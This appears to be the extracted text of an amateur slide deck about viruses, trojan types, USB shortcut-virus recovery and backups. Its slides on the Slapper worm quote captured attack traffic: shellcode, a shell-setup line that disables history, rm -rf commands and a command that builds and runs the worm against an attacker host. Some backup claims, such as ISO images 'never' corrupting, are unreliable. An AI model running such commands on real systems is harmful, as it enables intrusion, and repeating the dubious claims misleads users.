1. Virus & Data Protection
– Research by DKSoft...

2. Definitions of Virus
 History of Virus
 Goal & Properties of Virus
 Working of a Slapper (Worm Virus)
 Common experience of losing data
 Overview of Virus
 History of Virus
 Special Types of Trojans (Major Type of Virus)
 Concept of latest Trojans
 Virus Program Execution
 Working of a Slapper (Worm Virus)
 Data loss
 Data Protection
 Recommended Anti-Virus Softwares
Agenda

3. Definitions of Virus
 History of Virus
 Goal & Properties of Virus
 Working of a Slapper (Worm Virus)
 Common experience of losing data
Virus – Malicious program with set of destructive codes that starts
replicating to infect OS or user data when accessed it
Major Types of Viruses:
 Trojan Horse
Overview of Virus
 Worm
Some Features of Virus:
 locates & infects “.exe”, “.com”, “.dll” files
 Delete Files, Shutdown Programs, Eat up System
resources, hide or alter data
 VB & Command Scripts contain Assembly code for
Virus replication (Optional)

4. Definitions of Virus
 History of Virus
 Goal & Properties of Virus
 Working of a Slapper (Worm Virus)
 Common experience of losing data
Hex dump of a worm leaving message for Bill Gates III

5. 1. Elk Cloner :
 First real Virus written by Richard Skrenta for Apple II
 It will stick to all the disks
 It can also modify RAM
2. “Brain“ – First major PC Virus found in Lahore, Pakistan
Boot Sector of a Floppy infected by “Brain”
History of Virus

6. Special Types of Trojans

7.  Exploit – Spread malicious data in OS
 Backdoor – Created to give access of a Computer to
unauthorized user
 DDoS – Causes Web Address to fail
 Tiny Trojan Banker – Steals Bank details of a user or
organizaton
 FakeAV – Convinces user that the PC is infected with Virus
 Ransom – Designed for crime which modifies or blocks data
on a Computer & the data in the Computer

8. Downloader – Programmed to download & install new
malicious programs
 Spy – Invisible to user & observes Computer activities
silently by taking screenshots
 SpyEye – Targets Airline Travel & Banking Websites
 Zeus – Steals banking details & personal data, participate
in fraud schemes & other criminal works
 AIDS – Infects “.exe” & “.com” files

9. Concept of latest Trojan
Shortcut file--------------------Address------------X-----------Hidden Data
cmd.exe------------opens-----------explorer.exe
Step 1: Waits till it is accessed by user or Anti-Virus
Step 2: Sticks to specified System Files
Step 3: Permanently hides all Files & Folders present in External Drives
Step 4: Creates shortcuts of all the Files & Folders present in External Drives
Step 5: Opens particular File/Folder when its shortcut file is accessed
Step 6: Some Virus uses VB or Command scripts for replication & some have
capacity to self replicate inside the all External Drives connected to
the infected Computer
Shortcut----cmd.exe----explorer.exe----Hidden Data

10. The shortcut file is at front end & at back end, it contans
address of the hidden data

11. Infected programNormal program
Start 
End
Virus Program Execution

12. Working of Slapper

13. +
Slapper Requesting
HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10
GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4
OpenSSL/0.9.6b DAV/1.0.2 PHP/ 4.0.6 mod_perl/1.24_01..Connection:
close..Transfer-Encoding: chunked..Content-Type: text/html;
charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD
HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad quest</TITLE>. </HEAD>
<BODY>.<H1>Bad Request</H1>.Your browser sent a request that this
server could not understand.<P>.client sent HTTP/1.1 request
without hostname (see RFC2616 section 14.23): <P>. <HR>.
<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port
80</ADDRESS>.</BODY></HTML>...0....
68.168.1.15:52160 -> 127.0.0.1:80
GET / HTTP/1.1....
127.0.0.1:80 -> 68.168.1.15:52160 :52160

14. Slapper Attacking
...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-
..............hjE.H.o.,B...."Oo...:.....'...i..%._~-
...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G
@AAAA............AAAAAAAA....................................1...
.w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A
..1...Q[....1.Ph//shh/bin..PS.......
[..]
68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export
HISTFILE=/dev/null; export
PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.
68.168.1.15:52312 -> 127.0.0.1:443

15. Compiling and Installing
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd
/tmp/update; exit; .
68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c
/tmp/httpd /tmp /update /tmp/.unlock; .cat > /tmp/.unlock.uu <<
__eof__; .begin 655 .unlock
[worm source code, in uuencoded format, omitted]
68.168.1.15:52312 -> 127.0.0.1:443
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -
C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o
/tmp/update /tmp/.update.c;./tmp/httpd 68.168.1.15; /tmp/update;
.
68.168.1.15:52312 -> 127.0.0.1:443

16. obs: XXXX XXXX == localhost IP
YYYY YYYY == worm_host IP
0x70 == Incomming client flag
127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)
0x0000 4500 0038 0000 4000 4011 beb3 XXXX XXXX E..8..@.@.......
0x0010 YYYY YYYY 103c 103c 0024 92cb 0000 0000 ...'.<.<.$......
0x0020 8fff 0000 25b8 aaa8 7000 0000 0000 0000 ....%...p.......
^^
Remote Communications

17. Data Loss

18. Firstly, when a Virus infected Pendrive is inserted to a non-infected
PC, every data present in Pendrive will be in shortcut forms usually
with 1KB or 2KB size (or more in rare cases)

19. Secondly, user will open a folder (shortcut file) & feels that entire the
data is safe. But, this is when the virus spreads to the PC & all the
External Devices connected in future

20. User scans & commands the Anti-Virus to take proper actions

21. Anti-Virus deletes shortcut files present in the scanned Pendrive

22. After scanning, user opens the scanned
Pendrive. “OMG ! , I lost my important data”

23. The Virus re-appeared even in a non-infected Pendrive. It
spreads & replicates in all non-infected/infected External USB
Devices

24. Data Protection

25. When a virus infected Pendrive is inserted to a non-infected PC, note
that every data present in Pendrive will be in shortcuts. Never touch
the shortcut files.

26. Go to “Folder Options” present in “Control Panel”

27. Click on “View” tab present at the top of “Folder Options”

28. 1. Mark “Show hidden files, folders and drives”
2. Untick “Hide protected operating system files
(Recommended)”
3. Again open the same Pendrive

29. VB Scrpt & its shortcut (Trojan Virus) containing code for Virus to replicate
Original User data permanently
hidden
Trojan or Worm viruses
(as shortcuts to the Original
Data)
“.Trashes” file present at the top contains address of Recycle Bin

30. Properties of Trojan (shortcut)
Properties of user data folder

31. If files are present inside a folder, then they are 99.99% safe
It can be copied or moved to any other directories avoid
data corruption

32. Scan & take a safe copy of required data from the hidden folder

33. Never touch the auto-created shortcut files or unknown files

34. Read Privacy Statements
Understand what you
are getting before you
agree to download or
share your personal
information

35. Think Before You Click
 Be cautious with e-mail
attachments and links
 Only download
files from Web sites
you trust

36. Safely remove External Drives, Shutdown Computer properly & dont
save data in System Partititon

37. Use Power ISO, Win ISO, Ultra ISO, Magic ISO
or any other Softwares for Data Backup

38. Virus can be kidnapped & kept inside “.iso” file as locker

39. Advantages of creating “.iso” Image Data
 Easy to create
 Never corrupts
 Mount to a Virtual Drive & Access at high speed
 Provides very tight security for data stored in it
 OS or Anti-Virus cannot modify or delete its data
without user’s permission
 Portable with all OS supporting “.iso” Image Data
 Will not compress Data

40. SkyLabs Kaspersky
Symantec Norton
ESET
Bitdefender
Trend Micro
AVG
MS Essentials
Recommended Anti-Virus based on security levelsRecommended Anti-Virus by popularity levels
SkyLabs Kaspersky
Bitdefender
Symantec Norton
MS Essentials
Trend Micro
AVG
ESET

41. – Research continued by DKSoft...
dksoft2015.blogspot.in